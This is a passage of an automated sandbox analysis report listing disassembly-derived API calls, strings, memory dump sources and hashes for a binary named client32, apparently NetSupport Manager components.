                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                        • String ID: CMD=MESSAGERECEIVED$ID=%d$UF=%d$UN=%s
                                                                                                                        • API String ID: 3180605519-2489130399
                                                                                                                        • Opcode ID: be1b2ed499a75c248dc436f0a15684de5e59ac6cdfaa25d7c62d9ecc53664481
                                                                                                                        • Instruction ID: ed2e5005472555561ffbdb7ecee43a2ef06d5446aa46d8e385a5483ccb560183
                                                                                                                        • Opcode Fuzzy Hash: be1b2ed499a75c248dc436f0a15684de5e59ac6cdfaa25d7c62d9ecc53664481
                                                                                                                        • Instruction Fuzzy Hash: 9E211DBA940208BBDB15DBA4CD80EFFB77DAF84204F904545E946A7145EB30EE04C7B6
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26
                                                                                                                          • Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
                                                                                                                          • Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090
                                                                                                                        • _free.LIBCMT ref: 6859BC16
                                                                                                                          • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                          • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                        • String ID: CMD=MESSAGEACK$ID=%d$UF=%d$UN=%s
                                                                                                                        • API String ID: 3180605519-89615960
                                                                                                                        • Opcode ID: 3e97e1d741069c379ac5f2331bc110e81aace23006c012c3450ae54fd05b010f
                                                                                                                        • Instruction ID: c2cc48c68490ca840d2fe1c96b69fa4519afb4067d5fc353c0cfbf07b9cf76c3
                                                                                                                        • Opcode Fuzzy Hash: 3e97e1d741069c379ac5f2331bc110e81aace23006c012c3450ae54fd05b010f
                                                                                                                        • Instruction Fuzzy Hash: 10211ABA940209BAEB11DBA4CD80FFF777C9B84204F904545E946A7145EB30EE44C7B6
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
                                                                                                                        • _strrchr.LIBCMT ref: 68592ADA
                                                                                                                        • _strrchr.LIBCMT ref: 68592AEA
                                                                                                                        • wsprintfA.USER32 ref: 68592B05
                                                                                                                          • Part of subcall function 68592CE0: GetModuleHandleA.KERNEL32(NSMTRACE,68592AB1), ref: 68592CFA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                                        • String ID: HTCTL32
                                                                                                                        • API String ID: 2529650285-1670862073
                                                                                                                        • Opcode ID: 4cf07edff2dc204f15538a2f7aae05fd5e90645a6e982b2df453630d2fbad792
                                                                                                                        • Instruction ID: 7e4cd7d35d273060ca59b75ad80e455c758136003456b1f86abd4d2dda8c7ba4
                                                                                                                        • Opcode Fuzzy Hash: 4cf07edff2dc204f15538a2f7aae05fd5e90645a6e982b2df453630d2fbad792
                                                                                                                        • Instruction Fuzzy Hash: 7C2157349402889FDF12EB788C54BEA3BE6DB6A308FC000D8DD695B181D7704D45C792
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 68597E0E
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,?,?,00000000), ref: 68597EB7
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,00000000), ref: 68597ED0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave_memset
                                                                                                                        • String ID: RESULT$b
                                                                                                                        • API String ID: 3751686142-4141403093
                                                                                                                        • Opcode ID: a96e0333ae7cb6d1e73637153b6862fdea01ddb123530bc8d700d43756b20aed
                                                                                                                        • Instruction ID: a63f027b05deb2bcfac3b1eefe3d27bed1cb22870ce84a5912092fe3bf07f1e3
                                                                                                                        • Opcode Fuzzy Hash: a96e0333ae7cb6d1e73637153b6862fdea01ddb123530bc8d700d43756b20aed
                                                                                                                        • Instruction Fuzzy Hash: 28216DB1D00208AEDF00DFA8C8457AEBBB5FB49304F8140AAD859E6280EB355E448BA5
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset_strncpy
                                                                                                                        • String ID: apptype == APP_SLAVE$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$sv.slavetype == APP_SLAVE
                                                                                                                        • API String ID: 3140232205-2748231828
                                                                                                                        • Opcode ID: 7e40c6d7eb7de5a8faa91f28a454c97a0b75b4e114a52278b8922e585d326e83
                                                                                                                        • Instruction ID: 6860875bad1e82cfaa4f017d72a361e63720c14ad6a8b80ad64b0af2631a3704
                                                                                                                        • Opcode Fuzzy Hash: 7e40c6d7eb7de5a8faa91f28a454c97a0b75b4e114a52278b8922e585d326e83
                                                                                                                        • Instruction Fuzzy Hash: 2411E737680375A7FF10595DAC06BEE73AC8B52659F810025FE18A63C1E371AD98C39B
                                                                                                                        APIs
                                                                                                                        • GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F39E
                                                                                                                        • _memmove.LIBCMT ref: 1113F3ED
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProfileString_memmove
                                                                                                                        • String ID: ,,LPT1:$Device$Windows
                                                                                                                        • API String ID: 1665476579-2967085602
                                                                                                                        • Opcode ID: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
                                                                                                                        • Instruction ID: bcd620f34367886d122ba7e5b4bc1f5e42e64e22dfa310253f00a50472163b57
                                                                                                                        • Opcode Fuzzy Hash: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
                                                                                                                        • Instruction Fuzzy Hash: 42112965A0425B9AEB108F24AD45BBAF768EF8520DF0040A8ED859714AEA316609C7B3
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 685AFE0A
                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 685AFE19
                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 685AFE8C
                                                                                                                          • Part of subcall function 685AF540: InitializeCriticalSection.KERNEL32(685DCF98,89DA8021,?,?,?,?,?,685CEFC8,000000FF), ref: 685AF574
                                                                                                                          • Part of subcall function 685AF540: EnterCriticalSection.KERNEL32(685DCF98,89DA8021,?,?,?,?,?,685CEFC8,000000FF), ref: 685AF590
                                                                                                                          • Part of subcall function 685AF540: LeaveCriticalSection.KERNEL32(685DCF98,?,?,?,?,?,685CEFC8,000000FF), ref: 685AF5D8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$CurrentInitializeThread
                                                                                                                        • String ID: Refcount.cpp$p.second
                                                                                                                        • API String ID: 2150084884-1554893322
                                                                                                                        • Opcode ID: 72e1c82c3db0f6ddc629d461a9baae5b3dc115b08a82ed59b516ba7cbe8ca51c
                                                                                                                        • Instruction ID: 82dfdc97d1109b29ea20c6c21c06998a38accdf29b00e103d475a0ec0798b090
                                                                                                                        • Opcode Fuzzy Hash: 72e1c82c3db0f6ddc629d461a9baae5b3dc115b08a82ed59b516ba7cbe8ca51c
                                                                                                                        • Instruction Fuzzy Hash: D6218476900209EFCB11DF94D881FFFB7B8FB19314F50411AE912A3640D7706905CBA5
                                                                                                                        APIs
                                                                                                                        • __wcstoui64.LIBCMT ref: 68596107
                                                                                                                          • Part of subcall function 685B49AE: strtoxl.LIBCMT ref: 685B49D0
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,?,?,?,?,?,?,?,?,a3Zh), ref: 68596129
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,a3Zh,?,?,a3Zh), ref: 68596168
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave__wcstoui64strtoxl
                                                                                                                        • String ID: CONNECTION_ID$a3Zh
                                                                                                                        • API String ID: 2450600163-4042487306
                                                                                                                        • Opcode ID: 08565a8c8f094bba72c149b1d3157ff892c2acd3c82ce53916afd919921944ba
                                                                                                                        • Instruction ID: 197ebebdc615dfee0f6cae42d5b810645eb4da9ba0ffc776770a82b4bed84324
                                                                                                                        • Opcode Fuzzy Hash: 08565a8c8f094bba72c149b1d3157ff892c2acd3c82ce53916afd919921944ba
                                                                                                                        • Instruction Fuzzy Hash: 2211577AA003C07BEF1056D88C8076F33E69B82394F860035EE6653203F730A94986D7
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __strdup
                                                                                                                        • String ID: *this==src$IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                        • API String ID: 838363481-1357550281
                                                                                                                        • Opcode ID: 761f758348dd04650ceb551f35ae92cd56d4a8db723fbaaf6a8e8e7d59410c5e
                                                                                                                        • Instruction ID: aacf58824021b290d8ae50b648516e3cccfd6f49387ca27d8793d0643bb38f04
                                                                                                                        • Opcode Fuzzy Hash: 761f758348dd04650ceb551f35ae92cd56d4a8db723fbaaf6a8e8e7d59410c5e
                                                                                                                        • Instruction Fuzzy Hash: 1511087564070AAFCB00EF1CDC95D3EB7E9AFCA248B808025E998A7301E771BC1547D6
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 685AFFD8
                                                                                                                          • Part of subcall function 685ADAC0: SetEvent.KERNEL32(00000000), ref: 685ADAE4
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 685B000C
                                                                                                                          • Part of subcall function 685AFBC0: EnterCriticalSection.KERNEL32(?,?,75BF3550,685B001D), ref: 685AFBC8
                                                                                                                          • Part of subcall function 685AFBC0: LeaveCriticalSection.KERNEL32(?), ref: 685AFBD5
                                                                                                                        • PostMessageA.USER32(?,00000501,00000000,00000000), ref: 685B0034
                                                                                                                        • PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 685B003B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
                                                                                                                        • String ID: Queue
                                                                                                                        • API String ID: 620033763-3191623783
                                                                                                                        • Opcode ID: ac28e5f4d1ffac16dbc510ae5d610daa3d4224282cd7df1ed5a3209984a5edd5
                                                                                                                        • Instruction ID: 66180c00c9694a7332958dd7b552af92cae2674b2f01866e6182807ea18c3e1a
                                                                                                                        • Opcode Fuzzy Hash: ac28e5f4d1ffac16dbc510ae5d610daa3d4224282cd7df1ed5a3209984a5edd5
                                                                                                                        • Instruction Fuzzy Hash: 5D11AC79640609DBDA10DBA4C8A0B9F73A4AF9A3A4F814426EC159B380DB70EC40CB99
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 1114107C
                                                                                                                        • _memset.LIBCMT ref: 11141098
                                                                                                                        • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111410B6
                                                                                                                        • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 111410DF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$Count_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 162323998-4108050209
                                                                                                                        • Opcode ID: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
                                                                                                                        • Instruction ID: 2bcd32ba99f467236d3458310ced708016d2ad859b25bc85d693658704d9c718
                                                                                                                        • Opcode Fuzzy Hash: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
                                                                                                                        • Instruction Fuzzy Hash: E0016171A11219BBDB10DF95DD89FDEFBBCEB45758F108115F914E3140D7B0660487A1
                                                                                                                        APIs
                                                                                                                        • LoadStringA.USER32(00000000,?,00000058,7E4636A2), ref: 11141118
                                                                                                                        • wsprintfA.USER32 ref: 1114112E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadStringwsprintf
                                                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                        • API String ID: 104907563-3240211118
                                                                                                                        • Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                        • Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
                                                                                                                        • Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                        • Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                          • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                          • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                        • wsprintfA.USER32 ref: 685ADC04
                                                                                                                        • _memset.LIBCMT ref: 685ADC27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_malloc_memsetwsprintf
                                                                                                                        • String ID: Can't alloc %u bytes$Refcount.cpp
